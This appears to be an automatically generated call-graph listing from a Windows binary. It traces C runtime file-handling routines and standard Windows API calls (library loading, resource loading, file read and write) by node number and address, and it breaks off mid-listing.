GetSystemTimeAsFileTime 98454->98455 98456 ee9916 98455->98456 98457 ee992b 98456->98457 98458 ee9940 98456->98458 98459 ea2f95 _free 58 API calls 98457->98459 98460 ee9946 98458->98460 98461 ee99a5 98458->98461 98463 ee9931 98459->98463 98970 ee8d90 98460->98970 98462 ea2f95 _free 58 API calls 98461->98462 98465 ebd3c1 98462->98465 98466 ea2f95 _free 58 API calls 98463->98466 98465->98157 98469 e84faa 98465->98469 98466->98465 98468 ea2f95 _free 58 API calls 98468->98465 98470 e84fb4 98469->98470 98472 e84fbb 98469->98472 98471 ea55d6 __fcloseall 83 API calls 98470->98471 98471->98472 98473 e84fca 98472->98473 98474 e84fdb FreeLibrary 98472->98474 98473->98157 98474->98473 98476 e87faf 59 API calls 98475->98476 98477 e87b5d 98476->98477 98477->98357 98527 e84d61 98478->98527 98481 e84d4a FreeLibrary 98482 e84d53 98481->98482 98485 ea548b 98482->98485 98483 e84d61 2 API calls 98484 e84d3a 98483->98484 98484->98481 98484->98482 98531 ea54a0 98485->98531 98487 e84f5c 98487->98372 98487->98373 98688 e84d94 98488->98688 98491 e84ced 98492 e84d08 98491->98492 98493 e84cff FreeLibrary 98491->98493 98495 e84dd0 98492->98495 98493->98492 98494 e84d94 2 API calls 98494->98491 98496 ea0ff6 Mailbox 59 API calls 98495->98496 98497 e84de5 98496->98497 98498 e8538e 59 API calls 98497->98498 98499 e84df1 _memmove 98498->98499 98500 e84ee9 98499->98500 98501 e84f21 98499->98501 98505 e84e2c 98499->98505 98692 e84fe9 CreateStreamOnHGlobal 98500->98692 98703 ee9ba5 95 API calls 98501->98703 98502 e85027 69 API calls 98511 e84e35 98502->98511 98505->98502 98506 e8506b 74 API calls 98506->98511 98507 e84ec9 98507->98380 98509 ebdcd0 98510 e85045 85 API calls 98509->98510 98512 ebdce4 98510->98512 98511->98506 98511->98507 98511->98509 98698 e85045 98511->98698 98513 e8506b 74 API calls 98512->98513 98513->98507 98515 e8507d 98514->98515 98516 ebddf6 98514->98516 98727 ea5812 98515->98727 98519 ee9393 98925 ee91e9 98519->98925 98521 ee93a9 98521->98388 98523 e85036 98522->98523 98526 ebddb9 98522->98526 98930 ea5e90 98523->98930 98525 e8503e 98525->98390 98528 e84d2e 98527->98528 98529 e84d6a LoadLibraryA 98527->98529 98528->98483 98528->98484 98529->98528 98530 e84d7b GetProcAddress 98529->98530 98530->98528 98533 ea54ac __wfsopen 98531->98533 98532 ea54bf 98580 ea8d68 58 API calls __getptd_noexit 98532->98580 98533->98532 98535 ea54f0 98533->98535 98550 eb0738 98535->98550 98536 ea54c4 98581 ea8ff6 9 API calls __cftoe2_l 98536->98581 98539 ea54f5 98540 ea550b 98539->98540 98541 ea54fe 98539->98541 98543 ea5535 98540->98543 98544 ea5515 98540->98544 98582 ea8d68 58 API calls __getptd_noexit 98541->98582 98565 eb0857 98543->98565 98583 ea8d68 58 API calls __getptd_noexit 98544->98583 98546 ea54cf __wfsopen @_EH4_CallFilterFunc@8 98546->98487 98551 eb0744 __wfsopen 98550->98551 98552 ea9e4b __lock 58 API calls 98551->98552 98553 eb0752 98552->98553 98554 eb07cd 98553->98554 98561 ea9ed3 __mtinitlocknum 58 API calls 98553->98561 98563 eb07c6 98553->98563 98588 ea6e8d 59 API calls __lock 98553->98588 98589 ea6ef7 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 98553->98589 98590 ea8a5d 58 API calls 2 library calls 98554->98590 98557 eb0843 __wfsopen 98557->98539 98558 eb07d4 98558->98563 98591 eaa06b InitializeCriticalSectionAndSpinCount 98558->98591 98561->98553 98562 eb07fa RtlEnterCriticalSection 98562->98563 98585 eb084e 98563->98585 98566 eb0877 __wopenfile 98565->98566 98567 eb0891 98566->98567 98579 eb0a4c 98566->98579 98598 ea3a0b 60 API calls 2 library calls 98566->98598 98596 ea8d68 58 API calls __getptd_noexit 98567->98596 98569 eb0896 98597 ea8ff6 9 API calls __cftoe2_l 98569->98597 98571 eb0aaf 98593 eb87f1 98571->98593 98572 ea5540 98584 ea5562 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 98572->98584 98575 eb0a45 98575->98579 98599 ea3a0b 60 API calls 2 library calls 98575->98599 98577 eb0a64 98577->98579 98600 ea3a0b 60 API calls 2 library calls 98577->98600 98579->98567 98579->98571 98580->98536 98581->98546 98582->98546 98583->98546 98584->98546 98592 ea9fb5 RtlLeaveCriticalSection 98585->98592 98587 eb0855 98587->98557 98588->98553 98589->98553 98590->98558 98591->98562 98592->98587 98601 eb7fd5 98593->98601 98595 eb880a 98595->98572 98596->98569 98597->98572 98598->98575 98599->98577 98600->98579 98602 eb7fe1 __wfsopen 98601->98602 98603 eb7ff7 98602->98603 98606 eb802d 98602->98606 98685 ea8d68 58 API calls __getptd_noexit 98603->98685 98605 eb7ffc 98686 ea8ff6 9 API calls __cftoe2_l 98605->98686 98612 eb809e 98606->98612 98609 eb8049 98687 eb8072 RtlLeaveCriticalSection __unlock_fhandle 98609->98687 98611 eb8006 __wfsopen 98611->98595 98613 eb80be 98612->98613 98614 ea471a __wsopen_nolock 58 API calls 98613->98614 98617 eb80da 98614->98617 98615 ea9006 __invoke_watson 8 API calls 98616 eb87f0 98615->98616 98619 eb7fd5 __wsopen_helper 103 API calls 98616->98619 98618 eb8114 98617->98618 98625 eb8137 98617->98625 98634 eb8211 98617->98634 98621 ea8d34 __dosmaperr 58 API calls 98618->98621 98620 eb880a 98619->98620 98620->98609 98622 eb8119 98621->98622 98623 ea8d68 __cftoe2_l 58 API calls 98622->98623 98624 eb8126 98623->98624 98627 ea8ff6 __cftoe2_l 9 API calls 98624->98627 98626 eb81f5 98625->98626 98629 eb81d3 98625->98629 98628 ea8d34 __dosmaperr 58 API calls 98626->98628 98655 eb8130 98627->98655 98630 eb81fa 98628->98630 98635 ead4d4 __alloc_osfhnd 61 API calls 98629->98635 98631 ea8d68 __cftoe2_l 58 API calls 98630->98631 98632 eb8207 98631->98632 98633 ea8ff6 __cftoe2_l 9 API calls 98632->98633 98633->98634 98634->98615 98636 eb82a1 98635->98636 98637 eb82ab 98636->98637 98638 eb82ce 98636->98638 98640 ea8d34 __dosmaperr 58 API calls 98637->98640 98639 eb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98638->98639 98649 eb82f0 98639->98649 98641 eb82b0 98640->98641 98643 ea8d68 __cftoe2_l 58 API calls 98641->98643 98642 eb836e GetFileType 98644 eb83bb 98642->98644 98645 eb8379 GetLastError 98642->98645 98647 eb82ba 98643->98647 98658 ead76a __set_osfhnd 59 API calls 98644->98658 98648 ea8d47 __dosmaperr 58 API calls 98645->98648 98646 eb833c GetLastError 98650 ea8d47 __dosmaperr 58 API calls 98646->98650 98651 ea8d68 __cftoe2_l 58 API calls 98647->98651 98652 eb83a0 CloseHandle 98648->98652 98649->98642 98649->98646 98653 eb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98649->98653 98654 eb8361 98650->98654 98651->98655 98652->98654 98656 eb83ae 98652->98656 98657 eb8331 98653->98657 98660 ea8d68 __cftoe2_l 58 API calls 98654->98660 98655->98609 98659 ea8d68 __cftoe2_l 58 API calls 98656->98659 98657->98642 98657->98646 98663 eb83d9 98658->98663 98661 eb83b3 98659->98661 98660->98634 98661->98654 98662 eb8594 98662->98634 98666 eb8767 CloseHandle 98662->98666 98663->98662 98664 eb1b11 __lseeki64_nolock 60 API calls 98663->98664 98680 eb845a 98663->98680 98665 eb8443 98664->98665 98669 ea8d34 __dosmaperr 58 API calls 98665->98669 98665->98680 98667 eb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98666->98667 98668 eb878e 98667->98668 98670 eb87c2 98668->98670 98671 eb8796 GetLastError 98668->98671 98669->98680 98670->98634 98672 ea8d47 __dosmaperr 58 API calls 98671->98672 98673 eb87a2 98672->98673 98676 ead67d __free_osfhnd 59 API calls 98673->98676 98674 eb0d2d __close_nolock 61 API calls 98674->98680 98675 eb10ab 70 API calls __read_nolock 98675->98680 98676->98670 98677 eb99f2 __chsize_nolock 82 API calls 98677->98680 98678 eadac6 __write 78 API calls 98678->98680 98679 eb8611 98681 eb0d2d __close_nolock 61 API calls 98679->98681 98680->98662 98680->98674 98680->98675 98680->98677 98680->98678 98680->98679 98684 eb1b11 60 API calls __lseeki64_nolock 98680->98684 98682 eb8618 98681->98682 98683 ea8d68 __cftoe2_l 58 API calls 98682->98683 98683->98634 98684->98680 98685->98605 98686->98611 98687->98611 98689 e84ce1 98688->98689 98690 e84d9d LoadLibraryA 98688->98690 98689->98491 98689->98494 98690->98689 98691 e84dae GetProcAddress 98690->98691 98691->98689 98693 e85020 98692->98693 98694 e85003 FindResourceExW 98692->98694 98693->98505 98694->98693 98695 ebdd5c LoadResource 98694->98695 98695->98693 98696 ebdd71 SizeofResource 98695->98696 98696->98693 98697 ebdd85 LockResource 98696->98697 98697->98693 98699 e85054 98698->98699 98702 ebddd4 98698->98702 98704 ea5a7d 98699->98704 98701 e85062 98701->98511 98703->98505 98706 ea5a89 __wfsopen 98704->98706 98705 ea5a9b 98717 ea8d68 58 API calls __getptd_noexit 98705->98717 98706->98705 98708 ea5ac1 98706->98708 98719 ea6e4e 98708->98719 98709 ea5aa0 98718 ea8ff6 9 API calls __cftoe2_l 98709->98718 98712 ea5ac7 98725 ea59ee 83 API calls 5 library calls 98712->98725 98714 ea5ad6 98726 ea5af8 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 98714->98726 98716 ea5aab __wfsopen 98716->98701 98717->98709 98718->98716 98720 ea6e5e 98719->98720 98721 ea6e80 RtlEnterCriticalSection 98719->98721 98720->98721 98722 ea6e66 98720->98722 98723 ea6e76 98721->98723 98724 ea9e4b __lock 58 API calls 98722->98724 98723->98712 98724->98723 98725->98714 98726->98716 98730 ea582d 98727->98730 98729 e8508e 98729->98519 98731 ea5839 __wfsopen 98730->98731 98732 ea584f _memset 98731->98732 98733 ea587c 98731->98733 98734 ea5874 __wfsopen 98731->98734 98757 ea8d68 58 API calls __getptd_noexit 98732->98757 98735 ea6e4e __lock_file 59 API calls 98733->98735 98734->98729 98737 ea5882 98735->98737 98743 ea564d 98737->98743 98738 ea5869 98758 ea8ff6 9 API calls __cftoe2_l 98738->98758 98747 ea5668 _memset 98743->98747 98750 ea5683 98743->98750 98744 ea5673 98855 ea8d68 58 API calls __getptd_noexit 98744->98855 98746 ea5678 98856 ea8ff6 9 API calls __cftoe2_l 98746->98856 98747->98744 98747->98750 98751 ea56c3 98747->98751 98759 ea58b6 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 98750->98759 98751->98750 98752 ea57d4 _memset 98751->98752 98760 ea4916 98751->98760 98767 eb10ab 98751->98767 98835 eb0df7 98751->98835 98857 eb0f18 58 API calls 3 library calls 98751->98857 98858 ea8d68 58 API calls __getptd_noexit 98752->98858 98757->98738 98758->98734 98759->98734 98761 ea4920 98760->98761 98762 ea4935 98760->98762 98859 ea8d68 58 API calls __getptd_noexit 98761->98859 98762->98751 98764 ea4925 98860 ea8ff6 9 API calls __cftoe2_l 98764->98860 98766 ea4930 98766->98751 98768 eb10cc 98767->98768 98769 eb10e3 98767->98769 98870 ea8d34 58 API calls __getptd_noexit 98768->98870 98771 eb181b 98769->98771 98776 eb111d 98769->98776 98886 ea8d34 58 API calls __getptd_noexit 98771->98886 98773 eb10d1 98871 ea8d68 58 API calls __getptd_noexit 98773->98871 98774 eb1820 98887 ea8d68 58 API calls __getptd_noexit 98774->98887 98778 eb1125 98776->98778 98784 eb113c 98776->98784 98872 ea8d34 58 API calls __getptd_noexit 98778->98872 98779 eb1131 98888 ea8ff6 9 API calls __cftoe2_l 98779->98888 98780 eb10d8 98780->98751 98782 eb112a 98873 ea8d68 58 API calls __getptd_noexit 98782->98873 98784->98780 98785 eb1151 98784->98785 98788 eb116b 98784->98788 98789 eb1189 98784->98789 98874 ea8d34 58 API calls __getptd_noexit 98785->98874 98788->98785 98790 eb1176 98788->98790 98875 ea8a5d 58 API calls 2 library calls 98789->98875 98861 eb5ebb 98790->98861 98792 eb1199 98794 eb11bc 98792->98794 98795 eb11a1 98792->98795 98878 eb1b11 60 API calls 3 library calls 98794->98878 98876 ea8d68 58 API calls __getptd_noexit 98795->98876 98796 eb128a 98798 eb1303 ReadFile 98796->98798 98802 eb12a0 GetConsoleMode 98796->98802 98801 eb17e3 GetLastError 98798->98801 98806 eb1325 98798->98806 98800 eb11a6 98877 ea8d34 58 API calls __getptd_noexit 98800->98877 98804 eb17f0 98801->98804 98805 eb12e3 98801->98805 98807 eb1300 98802->98807 98808 eb12b4 98802->98808 98884 ea8d68 58 API calls __getptd_noexit 98804->98884 98818 eb12e9 98805->98818 98879 ea8d47 58 API calls 2 library calls 98805->98879 98806->98801 98810 eb12f5 98806->98810 98807->98798 98808->98807 98811 eb12ba ReadConsoleW 98808->98811 98817 eb15c7 98810->98817 98810->98818 98820 eb135a 98810->98820 98811->98810 98814 eb12dd GetLastError 98811->98814 98813 eb17f5 98885 ea8d34 58 API calls __getptd_noexit 98813->98885 98814->98805 98816 ea2f95 _free 58 API calls 98816->98780 98817->98818 98825 eb16cd ReadFile 98817->98825 98818->98780 98818->98816 98821 eb13c6 ReadFile 98820->98821 98827 eb1447 98820->98827 98822 eb13e7 GetLastError 98821->98822 98831 eb13f1 98821->98831 98822->98831 98823 eb1504 98829 eb14b4 MultiByteToWideChar 98823->98829 98882 eb1b11 60 API calls 3 library calls 98823->98882 98824 eb14f4 98881 ea8d68 58 API calls __getptd_noexit 98824->98881 98826 eb16f0 GetLastError 98825->98826 98834 eb16fe 98825->98834 98826->98834 98827->98818 98827->98823 98827->98824 98827->98829 98829->98814 98829->98818 98831->98820 98880 eb1b11 60 API calls 3 library calls 98831->98880 98834->98817 98883 eb1b11 60 API calls 3 library calls 98834->98883 98836 eb0e02 98835->98836 98837 eb0e17 98835->98837 98922 ea8d68 58 API calls __getptd_noexit 98836->98922 98841 eb0e4c 98837->98841 98846 eb0e12 98837->98846 98924 eb6234 58 API calls __malloc_crt 98837->98924 98839 eb0e07 98923 ea8ff6 9 API calls __cftoe2_l 98839->98923 98843 ea4916 __filbuf 58 API calls 98841->98843 98844 eb0e60 98843->98844 98889 eb0f97 98844->98889 98846->98751 98847 eb0e67 98847->98846 98848 ea4916 __filbuf 58 API calls 98847->98848 98849 eb0e8a 98848->98849 98849->98846 98850 ea4916 __filbuf 58 API calls 98849->98850 98851 eb0e96 98850->98851 98851->98846 98852 ea4916 __filbuf 58 API calls 98851->98852 98853 eb0ea3 98852->98853 98854 ea4916 __filbuf 58 API calls 98853->98854 98854->98846 98855->98746 98856->98750 98857->98751 98858->98746 98859->98764 98860->98766 98862 eb5ed3 98861->98862 98863 eb5ec6 98861->98863 98866 eb5edf 98862->98866 98867 ea8d68 __cftoe2_l 58 API calls 98862->98867 98864 ea8d68 __cftoe2_l 58 API calls 98863->98864 98865 eb5ecb 98864->98865 98865->98796 98866->98796 98868 eb5f00 98867->98868 98869 ea8ff6 __cftoe2_l 9 API calls 98868->98869 98869->98865 98870->98773 98871->98780 98872->98782 98873->98779 98874->98782 98875->98792 98876->98800 98877->98780 98878->98790 98879->98818 98880->98831 98881->98818 98882->98829 98883->98834 98884->98813 98885->98818 98886->98774 98887->98779 98888->98780 98890 eb0fa3 __wfsopen 98889->98890 98891 eb0fb0 98890->98891 98892 eb0fc7 98890->98892 98894 ea8d34 __dosmaperr 58 API calls 98891->98894 98893 eb108b 98892->98893 98895 eb0fdb 98892->98895 98896 ea8d34 __dosmaperr 58 API calls 98893->98896 98897 eb0fb5 98894->98897 98898 eb0ff9 98895->98898 98899 eb1006 98895->98899 98900 eb0ffe 98896->98900 98901 ea8d68 __cftoe2_l 58 API calls 98897->98901 98902 ea8d34 __dosmaperr 58 API calls 98898->98902 98903 eb1028 98899->98903 98904 eb1013 98899->98904 98907 ea8d68 __cftoe2_l 58 API calls 98900->98907 98911 eb0fbc __wfsopen 98901->98911 98902->98900 98906 ead446 ___lock_fhandle 59 API calls 98903->98906 98905 ea8d34 __dosmaperr 58 API calls 98904->98905 98908 eb1018 98905->98908 98909 eb102e 98906->98909 98910 eb1020 98907->98910 98912 ea8d68 __cftoe2_l 58 API calls 98908->98912 98913 eb1041 98909->98913 98914 eb1054 98909->98914 98916 ea8ff6 __cftoe2_l 9 API calls 98910->98916 98911->98847 98912->98910 98915 eb10ab __read_nolock 70 API calls 98913->98915 98917 ea8d68 __cftoe2_l 58 API calls 98914->98917 98918 eb104d 98915->98918 98916->98911 98919 eb1059 98917->98919 98921 eb1083 __read RtlLeaveCriticalSection 98918->98921 98920 ea8d34 __dosmaperr 58 API calls 98919->98920 98920->98918 98921->98911 98922->98839 98923->98846 98924->98841 98928 ea543a GetSystemTimeAsFileTime 98925->98928 98927 ee91f8 98927->98521 98929 ea5468 __aulldiv 98928->98929 98929->98927 98931 ea5e9c __wfsopen 98930->98931 98932 ea5eae 98931->98932 98933 ea5ec3 98931->98933 98944 ea8d68 58 API calls __getptd_noexit 98932->98944 98935 ea6e4e __lock_file 59 API calls 98933->98935 98937 ea5ec9 98935->98937 98936 ea5eb3 98945 ea8ff6 9 API calls __cftoe2_l 98936->98945 98946 ea5b00 67 API calls 5 library calls 98937->98946 98940 ea5ed4 98947 ea5ef4 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 98940->98947 98942 ea5ee6 98943 ea5ebe __wfsopen 98942->98943 98943->98525 98944->98936 98945->98943 98946->98940 98947->98942 98948->98397 98949->98410 98950->98412 98951->98409 98952->98418 98954 e892c9 Mailbox 98953->98954 98955 ebf5c8 98954->98955 98958 e892d3 98954->98958 98956 ea0ff6 Mailbox 59 API calls 98955->98956 98960 ebf5d4 98956->98960 98957 e892da 98957->98422 98958->98957 98961 e89df0 59 API calls Mailbox 98958->98961 98960->98960 98961->98958 98962->98433 98963->98432 98969 ee99d2 __tzset_nolock _wcscmp 98964->98969 98965 ee9866 98965->98439 98965->98465 98966 e8506b 74 API calls 98966->98969 98967 ee9393 GetSystemTimeAsFileTime 98967->98969 98968 e85045 85 API calls 98968->98969 98969->98965 98969->98966 98969->98967 98969->98968 98971 ee8da9 98970->98971 98972 ee8d9b 98970->98972 98974 ee8dee 98971->98974 98975 ea548b 115 API calls 98971->98975 99000 ee8db2 98971->99000 98973 ea548b 115 API calls 98972->98973 98973->98971 99001 ee901b 98974->99001 98976 ee8dd3 98975->98976 98976->98974 98979 ee8ddc 98976->98979 98978 ee8e32 98980 ee8e36 98978->98980 98981 ee8e57 98978->98981 98982 ea55d6 __fcloseall 83 API calls 98979->98982 98979->99000 98984 ee8e43 98980->98984 98986 ea55d6 __fcloseall 83 API calls 98980->98986 99005 ee8c33 98981->99005 98982->99000 98987 ea55d6 __fcloseall 83 API calls 98984->98987 98984->99000 98986->98984 98987->99000 98988 ee8e85 99014 ee8eb5 98988->99014 98989 ee8e65 98991 ee8e72 98989->98991 98993 ea55d6 __fcloseall 83 API calls 98989->98993 98995 ea55d6 __fcloseall 83 API calls 98991->98995 98991->99000 98993->98991 98995->99000 98997 ee8ea0 98999 ea55d6 __fcloseall 83 API calls 98997->98999 98997->99000 98999->99000 99000->98468 99002 ee9029 __tzset_nolock _memmove 99001->99002 99003 ee9040 99001->99003 99002->98978 99004 ea5812 __fread_nolock 74 API calls 99003->99004 99004->99002 99006 ea594c __crtLCMapStringA_stat 58 API calls 99005->99006 99007 ee8c42 99006->99007 99008 ea594c __crtLCMapStringA_stat 58 API calls 99007->99008 99009 ee8c56 99008->99009 99010 ea594c __crtLCMapStringA_stat 58 API calls 99009->99010 99011 ee8c6a 99010->99011 99012 ee8f97 58 API calls 99011->99012 99013 ee8c7d 99011->99013 99012->99013 99013->98988 99013->98989 99015 ee8eca 99014->99015 99016 ee8f82 99015->99016 99018 ee8c8f 74 API calls 99015->99018 99021 ee8e8c 99015->99021 99043 ee909c 99015->99043 99051 ee8d2b 74 API calls 99015->99051 99047 ee91bf 99016->99047 99018->99015 99022 ee8f97 99021->99022 99023 ee8fa4 99022->99023 99025 ee8faa 99022->99025 99026 ea2f95 _free 58 API calls 99023->99026 99024 ee8fbb 99028 ee8e93 99024->99028 99029 ea2f95 _free 58 API calls 99024->99029 99025->99024 99027 ea2f95 _free 58 API calls 99025->99027 99026->99025 99027->99024 99028->98997 99030 ea55d6 99028->99030 99029->99028 99031 ea55e2 __wfsopen 99030->99031 99032 ea560e 99031->99032 99033 ea55f6 99031->99033 99035 ea6e4e __lock_file 59 API calls 99032->99035 99040 ea5606 __wfsopen 99032->99040 99100 ea8d68 58 API calls __getptd_noexit 99033->99100 99037 ea5620 99035->99037 99036 ea55fb 99101 ea8ff6 9 API calls __cftoe2_l 99036->99101 99084 ea556a 99037->99084 99040->98997 99044 ee90ab 99043->99044 99045 ee90eb 99043->99045 99044->99015 99045->99044 99052 ee9172 99045->99052 99048 ee91cc 99047->99048 99049 ee91dd 99047->99049 99050 ea4a93 80 API calls 99048->99050 99049->99021 99050->99049 99051->99015 99053 ee919e 99052->99053 99054 ee91af 99052->99054 99056 ea4a93 99053->99056 99054->99045 99057 ea4a9f __wfsopen 99056->99057 99058 ea4abd 99057->99058 99059 ea4ad5 99057->99059 99060 ea4acd __wfsopen 99057->99060 99081 ea8d68 58 API calls __getptd_noexit 99058->99081 99061 ea6e4e __lock_file 59 API calls 99059->99061 99060->99054 99064 ea4adb 99061->99064 99063 ea4ac2 99082 ea8ff6 9 API calls __cftoe2_l 99063->99082 99069 ea493a 99064->99069 99070 ea4949 99069->99070 99075 ea4967 99069->99075 99071 ea4957 99070->99071 99070->99075 99079 ea4981 _memmove 99070->99079 99072 ea8d68 __cftoe2_l 58 API calls 99071->99072 99073 ea495c 99072->99073 99074 ea8ff6 __cftoe2_l 9 API calls 99073->99074 99074->99075 99083 ea4b0d RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 99075->99083 99076 eab05e __flsbuf 78 API calls 99076->99079 99077 ea4c6d __flush 78 API calls 99077->99079 99078 ea4916 __filbuf 58 API calls 99078->99079 99079->99075 99079->99076 99079->99077 99079->99078 99080 eadac6 __write 78 API calls 99079->99080 99080->99079 99081->99063 99082->99060 99083->99060 99085 ea5579 99084->99085 99086 ea558d 99084->99086 99139 ea8d68 58 API calls __getptd_noexit 99085->99139 99092 ea5589 99086->99092 99103 ea4c6d 99086->99103 99088 ea557e 99140 ea8ff6 9 API calls __cftoe2_l 99088->99140 99102 ea5645 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 99092->99102 99095 ea4916 __filbuf 58 API calls 99096 ea55a7 99095->99096 99113 eb0c52 99096->99113 99098 ea55ad 99098->99092 99099 ea2f95 _free 58 API calls 99098->99099 99099->99092 99100->99036 99101->99040 99102->99040 99104 ea4ca4 99103->99104 99105 ea4c80 99103->99105 99109 eb0dc7 99104->99109 99105->99104 99106 ea4916 __filbuf 58 API calls 99105->99106 99107 ea4c9d 99106->99107 99141 eadac6 99107->99141 99110 eb0dd4 99109->99110 99112 ea55a1 99109->99112 99111 ea2f95 _free 58 API calls 99110->99111 99110->99112 99111->99112 99112->99095 99114 eb0c5e __wfsopen 99113->99114 99115 eb0c6b 99114->99115 99116 eb0c82 99114->99116 99266 ea8d34 58 API calls __getptd_noexit 99115->99266 99118 eb0d0d 99116->99118 99120 eb0c92 99116->99120 99271 ea8d34 58 API calls __getptd_noexit 99118->99271 99119 eb0c70 99267 ea8d68 58 API calls __getptd_noexit 99119->99267 99123 eb0cba 99120->99123 99124 eb0cb0 99120->99124 99126 ead446 ___lock_fhandle 59 API calls 99123->99126 99268 ea8d34 58 API calls __getptd_noexit 99124->99268 99125 eb0cb5 99272 ea8d68 58 API calls __getptd_noexit 99125->99272 99128 eb0cc0 99126->99128 99131 eb0cde 99128->99131 99132 eb0cd3 99128->99132 99130 eb0d19 99273 ea8ff6 9 API calls __cftoe2_l 99130->99273 99269 ea8d68 58 API calls __getptd_noexit 99131->99269 99251 eb0d2d 99132->99251 99135 eb0c77 __wfsopen 99135->99098 99137 eb0cd9 99270 eb0d05 RtlLeaveCriticalSection __unlock_fhandle 99137->99270 99139->99088 99140->99092 99142 eadad2 __wfsopen 99141->99142 99143 eadadf 99142->99143 99144 eadaf6 99142->99144 99242 ea8d34 58 API calls __getptd_noexit 99143->99242 99146 eadb95 99144->99146 99148 eadb0a 99144->99148 99248 ea8d34 58 API calls __getptd_noexit 99146->99248 99147 eadae4 99243 ea8d68 58 API calls __getptd_noexit 99147->99243 99151 eadb28 99148->99151 99152 eadb32 99148->99152 99244 ea8d34 58 API calls __getptd_noexit 99151->99244 99169 ead446 99152->99169 99153 eadb2d 99249 ea8d68 58 API calls __getptd_noexit 99153->99249 99156 eadb38 99158 eadb4b 99156->99158 99159 eadb5e 99156->99159 99178 eadbb5 99158->99178 99245 ea8d68 58 API calls __getptd_noexit 99159->99245 99160 eadba1 99250 ea8ff6 9 API calls __cftoe2_l 99160->99250 99164 eadaeb __wfsopen 99164->99104 99165 eadb57 99247 eadb8d RtlLeaveCriticalSection __unlock_fhandle 99165->99247 99166 eadb63 99246 ea8d34 58 API calls __getptd_noexit 99166->99246 99170 ead452 __wfsopen 99169->99170 99171 ead4a1 RtlEnterCriticalSection 99170->99171 99173 ea9e4b __lock 58 API calls 99170->99173 99172 ead4c7 __wfsopen 99171->99172 99172->99156 99174 ead477 99173->99174 99175 ead48f 99174->99175 99177 eaa06b __alloc_osfhnd InitializeCriticalSectionAndSpinCount 99174->99177 99176 ead4cb ___lock_fhandle RtlLeaveCriticalSection 99175->99176 99176->99171 99177->99175 99179 eadbc2 __write_nolock 99178->99179 99180 eadbf6 99179->99180 99181 eadc20 99179->99181 99182 eadc01 99179->99182 99183 eac836 __cftoe2_l 6 API calls 99180->99183 99187 eadc78 99181->99187 99188 eadc5c 99181->99188 99184 ea8d34 __dosmaperr 58 API calls 99182->99184 99185 eae416 99183->99185 99186 eadc06 99184->99186 99185->99165 99189 ea8d68 __cftoe2_l 58 API calls 99186->99189 99190 eadc91 99187->99190 99193 eb1b11 __lseeki64_nolock 60 API calls 99187->99193 99191 ea8d34 __dosmaperr 58 API calls 99188->99191 99192 eadc0d 99189->99192 99194 eb5ebb __read_nolock 58 API calls 99190->99194 99195 eadc61 99191->99195 99196 ea8ff6 __cftoe2_l 9 API calls 99192->99196 99193->99190 99197 eadc9f 99194->99197 99198 ea8d68 __cftoe2_l 58 API calls 99195->99198 99196->99180 99200 eadff8 99197->99200 99204 ea9bec __setmbcp 58 API calls 99197->99204 99199 eadc68 99198->99199 99201 ea8ff6 __cftoe2_l 9 API calls 99199->99201 99202 eae38b WriteFile 99200->99202 99203 eae016 99200->99203 99201->99180 99205 eadfeb GetLastError 99202->99205 99215 eadfb8 99202->99215 99206 eae13a 99203->99206 99213 eae02c 99203->99213 99209 eadccb GetConsoleMode 99204->99209 99205->99215 99208 eae145 99206->99208 99216 eae22f 99206->99216 99207 eae3c4 99207->99180 99214 ea8d68 __cftoe2_l 58 API calls 99207->99214 99208->99207 99221 eae1aa WriteFile 99208->99221 99209->99200 99210 eadd0a 99209->99210 99210->99200 99211 eadd1a GetConsoleCP 99210->99211 99211->99207 99238 eadd49 99211->99238 99212 eae09b WriteFile 99212->99205 99217 eae0d8 99212->99217 99213->99207 99213->99212 99218 eae3f2 99214->99218 99215->99180 99215->99207 99219 eae118 99215->99219 99216->99207 99220 eae2a4 WideCharToMultiByte 99216->99220 99217->99213 99233 eae0fc 99217->99233 99222 ea8d34 __dosmaperr 58 API calls 99218->99222 99223 eae3bb 99219->99223 99224 eae123 99219->99224 99220->99205 99235 eae2eb 99220->99235 99221->99205 99226 eae1f9 99221->99226 99222->99180 99225 ea8d47 __dosmaperr 58 API calls 99223->99225 99227 ea8d68 __cftoe2_l 58 API calls 99224->99227 99225->99180 99226->99208 99226->99215 99226->99233 99229 eae128 99227->99229 99228 eae2f3 WriteFile 99232 eae346 GetLastError 99228->99232 99228->99235 99230 ea8d34 __dosmaperr 58 API calls 99229->99230 99230->99180 99231 ea3835 __write_nolock 58 API calls 99231->99238 99232->99235 99233->99215 99234 eb650a 60 API calls __write_nolock 99234->99238 99235->99215 99235->99216 99235->99228 99235->99233 99236 eade32 WideCharToMultiByte 99236->99215 99237 eade6d WriteFile 99236->99237 99237->99205 99240 eade9f 99237->99240 99238->99215 99238->99231 99238->99234 99238->99236 99238->99240 99239 eb7cae WriteConsoleW CreateFileW __putwch_nolock 99239->99240 99240->99205 99240->99215 99240->99238 99240->99239 99241 eadec7 WriteFile 99240->99241 99241->99205 99241->99240 99242->99147 99243->99164 99244->99153 99245->99166 99246->99165 99247->99164 99248->99153 99249->99160 99250->99164 99274 ead703 99251->99274 99253 eb0d91 99287 ead67d 59 API calls 2 library calls 99253->99287 99255 eb0d3b 99255->99253 99256 eb0d6f 99255->99256 99257 ead703 __lseek_nolock 58 API calls 99255->99257 99256->99253 99258 ead703 __lseek_nolock 58 API calls 99256->99258 99260 eb0d66 99257->99260 99261 eb0d7b CloseHandle 99258->99261 99259 eb0d99 99262 eb0dbb 99259->99262 99288 ea8d47 58 API calls 2 library calls 99259->99288 99263 ead703 __lseek_nolock 58 API calls 99260->99263 99261->99253 99264 eb0d87 GetLastError 99261->99264 99262->99137 99263->99256 99264->99253 99266->99119 99267->99135 99268->99125 99269->99137 99270->99135 99271->99125 99272->99130 99273->99135 99275 ead70e 99274->99275 99278 ead723 99274->99278 99276 ea8d34 __dosmaperr 58 API calls 99275->99276 99277 ead713 99276->99277 99280 ea8d68 __cftoe2_l 58 API calls 99277->99280 99279 ea8d34 __dosmaperr 58 API calls 99278->99279 99281 ead748 99278->99281 99282 ead752 99279->99282 99284 ead71b 